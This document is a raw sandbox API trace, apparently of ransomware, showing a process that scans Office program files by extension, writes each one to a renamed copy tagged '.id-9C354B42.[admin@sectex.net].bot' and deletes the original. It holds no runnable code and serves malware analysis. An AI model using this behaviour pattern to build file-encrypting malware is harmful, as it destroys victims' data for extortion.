	[0144.360] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0144.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL") returned 60
	[0144.360] lstrlenW (lpString=".dbf") returned 4
	[0144.360] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0144.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL") returned 60
	[0144.360] lstrlenW (lpString=".1cd") returned 4
	[0144.360] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0144.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL") returned 60
	[0144.360] lstrlenW (lpString=".jpg") returned 4
	[0144.360] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0144.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL") returned 60
	[0144.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL") returned 60
	[0144.360] lstrlenW (lpString=".doc") returned 4
	[0144.361] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0144.361] lstrlenW (lpString=".docx") returned 5
	[0144.361] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0144.361] lstrlenW (lpString=".pdf") returned 4
	[0144.361] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0144.361] lstrlenW (lpString=".xls") returned 4
	[0144.361] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0144.361] lstrlenW (lpString=".xlsx") returned 5
	[0144.361] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0144.361] lstrlenW (lpString=".ppt") returned 4
	[0144.361] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0144.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL") returned 60
	[0144.361] lstrlenW (lpString=".zip") returned 4
	[0144.361] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0144.361] lstrlenW (lpString=".rar") returned 4
	[0144.361] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0144.361] lstrlenW (lpString=".bz2") returned 4
	[0144.361] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0144.361] lstrlenW (lpString=".7z") returned 3
	[0144.361] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0144.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL") returned 60
	[0144.361] lstrlenW (lpString=".dbf") returned 4
	[0144.361] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0144.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL") returned 60
	[0144.361] lstrlenW (lpString=".1cd") returned 4
	[0144.361] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0144.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL") returned 60
	[0144.361] lstrlenW (lpString=".jpg") returned 4
	[0144.361] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0144.361] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0144.362] lstrlenW (lpString="EDITRES.DLL") returned 11
	[0144.362] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\editres.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0144.388] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=19840) returned 1
	[0144.388] CloseHandle (hObject=0x38c) returned 1
	[0144.388] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\editres.dll")) returned 0x20
	[0144.492] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\editres.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.492] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\editres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0144.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL") returned 59
	[0144.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL") returned 59
	[0144.494] lstrlenW (lpString=".doc") returned 4
	[0144.494] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0144.494] lstrlenW (lpString=".docx") returned 5
	[0144.494] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0144.494] lstrlenW (lpString=".pdf") returned 4
	[0144.494] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0144.494] lstrlenW (lpString=".xls") returned 4
	[0144.494] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0144.494] lstrlenW (lpString=".xlsx") returned 5
	[0144.494] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0144.495] lstrlenW (lpString=".ppt") returned 4
	[0144.495] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0144.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL") returned 59
	[0144.495] lstrlenW (lpString=".zip") returned 4
	[0144.495] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0144.495] lstrlenW (lpString=".rar") returned 4
	[0144.495] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0144.495] lstrlenW (lpString=".bz2") returned 4
	[0144.495] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0144.495] lstrlenW (lpString=".7z") returned 3
	[0144.495] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0144.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL") returned 59
	[0144.495] lstrlenW (lpString=".dbf") returned 4
	[0144.495] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0144.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL") returned 59
	[0144.495] lstrlenW (lpString=".1cd") returned 4
	[0144.495] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0144.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL") returned 59
	[0144.495] lstrlenW (lpString=".jpg") returned 4
	[0144.495] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0144.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL") returned 59
	[0144.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL") returned 59
	[0144.495] lstrlenW (lpString=".doc") returned 4
	[0144.495] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0144.495] lstrlenW (lpString=".docx") returned 5
	[0144.495] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0144.495] lstrlenW (lpString=".pdf") returned 4
	[0144.495] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0144.495] lstrlenW (lpString=".xls") returned 4
	[0144.495] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0144.495] lstrlenW (lpString=".xlsx") returned 5
	[0144.495] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0144.496] lstrlenW (lpString=".ppt") returned 4
	[0144.496] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0144.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL") returned 59
	[0144.496] lstrlenW (lpString=".zip") returned 4
	[0144.496] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0144.496] lstrlenW (lpString=".rar") returned 4
	[0144.496] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0144.496] lstrlenW (lpString=".bz2") returned 4
	[0144.496] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0144.496] lstrlenW (lpString=".7z") returned 3
	[0144.496] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0144.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL") returned 59
	[0144.496] lstrlenW (lpString=".dbf") returned 4
	[0144.496] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0144.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL") returned 59
	[0144.496] lstrlenW (lpString=".1cd") returned 4
	[0144.496] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0144.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL") returned 59
	[0144.496] lstrlenW (lpString=".jpg") returned 4
	[0144.496] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0144.496] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0144.496] lstrlenW (lpString="EXCEL_COL.HXT") returned 13
	[0144.496] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0144.497] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=205) returned 1
	[0144.497] CloseHandle (hObject=0x3c4) returned 1
	[0144.497] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxt")) returned 0x20
	[0144.497] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.497] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0144.497] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.497] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.497] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.524] GetLastError () returned 0x0
	[0144.524] ReadFile (in: hFile=0x3c4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0xcd, lpOverlapped=0x0) returned 1
	[0144.531] WriteFile (in: hFile=0x25c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xd0, lpOverlapped=0x0) returned 1
	[0144.532] ReadFile (in: hFile=0x3c4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.532] WriteFile (in: hFile=0x25c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xee, lpOverlapped=0x0) returned 1
	[0144.532] SetEndOfFile (hFile=0x25c) returned 1
	[0144.532] CloseHandle (hObject=0x25c) returned 1
	[0144.532] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.532] SetEndOfFile (hFile=0x3c4) returned 1
	[0144.535] CloseHandle (hObject=0x3c4) returned 1
	[0144.535] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.607] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxt")) returned 1
	[0144.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT") returned 61
	[0144.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT") returned 61
	[0144.607] lstrlenW (lpString=".doc") returned 4
	[0144.607] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0144.607] lstrlenW (lpString=".docx") returned 5
	[0144.608] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0144.608] lstrlenW (lpString=".pdf") returned 4
	[0144.608] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0144.608] lstrlenW (lpString=".xls") returned 4
	[0144.608] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0144.608] lstrlenW (lpString=".xlsx") returned 5
	[0144.608] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0144.608] lstrlenW (lpString=".ppt") returned 4
	[0144.608] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0144.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT") returned 61
	[0144.608] lstrlenW (lpString=".zip") returned 4
	[0144.608] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0144.608] lstrlenW (lpString=".rar") returned 4
	[0144.608] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0144.608] lstrlenW (lpString=".bz2") returned 4
	[0144.608] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0144.608] lstrlenW (lpString=".7z") returned 3
	[0144.608] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0144.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT") returned 61
	[0144.608] lstrlenW (lpString=".dbf") returned 4
	[0144.608] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0144.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT") returned 61
	[0144.608] lstrlenW (lpString=".1cd") returned 4
	[0144.608] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0144.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT") returned 61
	[0144.608] lstrlenW (lpString=".jpg") returned 4
	[0144.608] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0144.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT") returned 61
	[0144.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT") returned 61
	[0144.608] lstrlenW (lpString=".doc") returned 4
	[0144.608] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0144.608] lstrlenW (lpString=".docx") returned 5
	[0144.609] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0144.609] lstrlenW (lpString=".pdf") returned 4
	[0144.609] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0144.609] lstrlenW (lpString=".xls") returned 4
	[0144.609] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0144.609] lstrlenW (lpString=".xlsx") returned 5
	[0144.609] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0144.609] lstrlenW (lpString=".ppt") returned 4
	[0144.609] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0144.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT") returned 61
	[0144.609] lstrlenW (lpString=".zip") returned 4
	[0144.609] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0144.609] lstrlenW (lpString=".rar") returned 4
	[0144.609] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0144.609] lstrlenW (lpString=".bz2") returned 4
	[0144.609] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0144.609] lstrlenW (lpString=".7z") returned 3
	[0144.609] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0144.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT") returned 61
	[0144.609] lstrlenW (lpString=".dbf") returned 4
	[0144.609] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0144.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT") returned 61
	[0144.609] lstrlenW (lpString=".1cd") returned 4
	[0144.609] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0144.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT") returned 61
	[0144.609] lstrlenW (lpString=".jpg") returned 4
	[0144.609] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0144.609] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0144.609] lstrlenW (lpString="FACILITY.VSL") returned 12
	[0144.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\facility.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0145.752] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=81768) returned 1
	[0145.752] CloseHandle (hObject=0x38c) returned 1
	[0145.752] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\facility.vsl")) returned 0x20
	[0145.771] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\facility.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.771] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\facility.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0145.771] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.771] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.771] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\facility.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0145.772] GetLastError () returned 0x0
	[0145.772] ReadFile (in: hFile=0x31c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x13f68, lpOverlapped=0x0) returned 1
	[0145.784] WriteFile (in: hFile=0x3c0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x13f70, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x13f70, lpOverlapped=0x0) returned 1
	[0145.786] ReadFile (in: hFile=0x31c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.786] WriteFile (in: hFile=0x3c0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.786] SetEndOfFile (hFile=0x3c0) returned 1
	[0145.786] CloseHandle (hObject=0x3c0) returned 1
	[0145.786] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.786] SetEndOfFile (hFile=0x31c) returned 1
	[0145.789] CloseHandle (hObject=0x31c) returned 1
	[0145.789] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.854] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\facility.vsl")) returned 1
	[0145.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL") returned 60
	[0145.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL") returned 60
	[0145.855] lstrlenW (lpString=".doc") returned 4
	[0145.855] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0145.855] lstrlenW (lpString=".docx") returned 5
	[0145.855] lstrcmpiW (lpString1=".docx", lpString2="Y.VSL") returned -1
	[0145.855] lstrlenW (lpString=".pdf") returned 4
	[0145.855] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0145.855] lstrlenW (lpString=".xls") returned 4
	[0145.855] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0145.855] lstrlenW (lpString=".xlsx") returned 5
	[0145.855] lstrcmpiW (lpString1=".xlsx", lpString2="Y.VSL") returned -1
	[0145.855] lstrlenW (lpString=".ppt") returned 4
	[0145.855] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0145.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL") returned 60
	[0145.855] lstrlenW (lpString=".zip") returned 4
	[0145.855] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0145.855] lstrlenW (lpString=".rar") returned 4
	[0145.855] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0145.855] lstrlenW (lpString=".bz2") returned 4
	[0145.855] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0145.855] lstrlenW (lpString=".7z") returned 3
	[0145.855] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0145.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL") returned 60
	[0145.855] lstrlenW (lpString=".dbf") returned 4
	[0145.855] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0145.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL") returned 60
	[0145.855] lstrlenW (lpString=".1cd") returned 4
	[0145.855] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0145.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL") returned 60
	[0145.855] lstrlenW (lpString=".jpg") returned 4
	[0145.855] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0145.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL") returned 60
	[0145.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL") returned 60
	[0145.856] lstrlenW (lpString=".doc") returned 4
	[0145.856] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0145.856] lstrlenW (lpString=".docx") returned 5
	[0145.856] lstrcmpiW (lpString1=".docx", lpString2="Y.VSL") returned -1
	[0145.856] lstrlenW (lpString=".pdf") returned 4
	[0145.856] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0145.856] lstrlenW (lpString=".xls") returned 4
	[0145.856] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0145.856] lstrlenW (lpString=".xlsx") returned 5
	[0145.856] lstrcmpiW (lpString1=".xlsx", lpString2="Y.VSL") returned -1
	[0145.856] lstrlenW (lpString=".ppt") returned 4
	[0145.856] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0145.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL") returned 60
	[0145.856] lstrlenW (lpString=".zip") returned 4
	[0145.856] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0145.856] lstrlenW (lpString=".rar") returned 4
	[0145.856] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0145.856] lstrlenW (lpString=".bz2") returned 4
	[0145.856] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0145.856] lstrlenW (lpString=".7z") returned 3
	[0145.856] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0145.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL") returned 60
	[0145.856] lstrlenW (lpString=".dbf") returned 4
	[0145.856] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0145.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL") returned 60
	[0145.856] lstrlenW (lpString=".1cd") returned 4
	[0145.856] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0145.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL") returned 60
	[0145.856] lstrlenW (lpString=".jpg") returned 4
	[0145.856] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0145.857] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0145.857] lstrlenW (lpString="GRINTL32.REST.IDX_DLL") returned 21
	[0145.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.rest.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
